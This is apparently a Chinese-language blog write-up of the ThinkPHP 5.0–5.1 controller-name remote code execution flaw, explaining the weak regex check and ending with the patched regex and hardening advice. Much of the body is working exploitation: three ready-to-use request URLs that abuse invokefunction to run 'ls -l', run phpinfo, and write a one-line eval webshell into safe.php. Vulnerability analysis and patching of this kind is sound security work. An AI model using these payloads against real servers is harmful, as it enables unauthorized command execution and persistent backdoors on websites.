THINKPHP漏洞修複,官方于近日,對現有的thinkphp5.0到5.1所有版本進行了更新,以及更新檔更新,這次更新主要是進行了一些漏洞修複,最嚴重的就是之前存在的SQL注入漏洞,以及遠端代碼執行查詢系統的漏洞都進行了修複,官方本以為沒有問題了,但是在實際的安全檢測當中發現,還是存在問題,還是可以遠端代碼進行注入,插入非法字元,送出到伺服器後端中去。
關于這次發現的oday漏洞,我們來看下官方之前更新的代碼檔案是怎麼樣的,更新的程式檔案路徑是library檔案夾下的think目錄裡的app.php,如下圖:
漏洞産生的原因就在于這個控制器這裡,整個thinkphp架構裡的功能對控制器沒有進行嚴格的安全過濾于檢查,使攻擊者可以僞造惡意參數進行強制插入,最根本的原因就是正則的表達式寫的不好,導緻可以繞過。
在controller擷取控制器後,直接進行指派,但是并沒有對控制器的名進行嚴格的檢測,導緻可以使用斜杠等特殊符号來遠端代碼注入。
我們來搭建一下網站的環境,apache+mysql+Linux centos系統,搭建好的測試環境位址是127.0.01/anquan ,我們可以直接在index.php後面僞造攻擊參數,示例如下:
127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l 直接get方式送出到網站中去,可以直接查詢到網站目前根目錄的所有檔案,截圖如下:
通過該漏洞也可以直接遠端代碼注入執行phpinfo語句,查詢目前的php版本,路徑,擴充,以及php.ini存放的位址,都可以看得到,構造如下代碼即可。
127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' 有些人可能會問了,既然都可以phpinfo,查詢目錄檔案,可不可以getshell寫網站木馬檔案到網站裡呢? 答案是可以的,我們測試的時候是以一句話木馬代碼的寫入到safe.php檔案裡。
127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_GET["cmd"]);?>%27%20>%20safe.php 關于這次thinkphp的漏洞利用以及分析到此就結束了,該漏洞屬于高危漏洞,危害嚴重性較大,很多更新更新更新檔的網站都會受到攻擊,甚至有些網站會被挂馬,那麼該如何修複thinkphp的漏洞呢?替換之前的正規則表達式即可,還需要對網站的目錄進行權限部署,防止生成php檔案,對網站上的漏洞進行修複,或者是對網站安全防護參數進行重新設定,使他符合當時的網站環境。如果不懂如何修複網站漏洞,也可以找專業的網站安全公司來處理,國内如Sinesafe和綠盟、啟明星辰等安全公司比較專業.
針對于這個情況,我們要對其library/think/App.php代碼裡的正規則表達式進行更改,
if (!preg_match('/^[A-Za-z][\w\.]*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }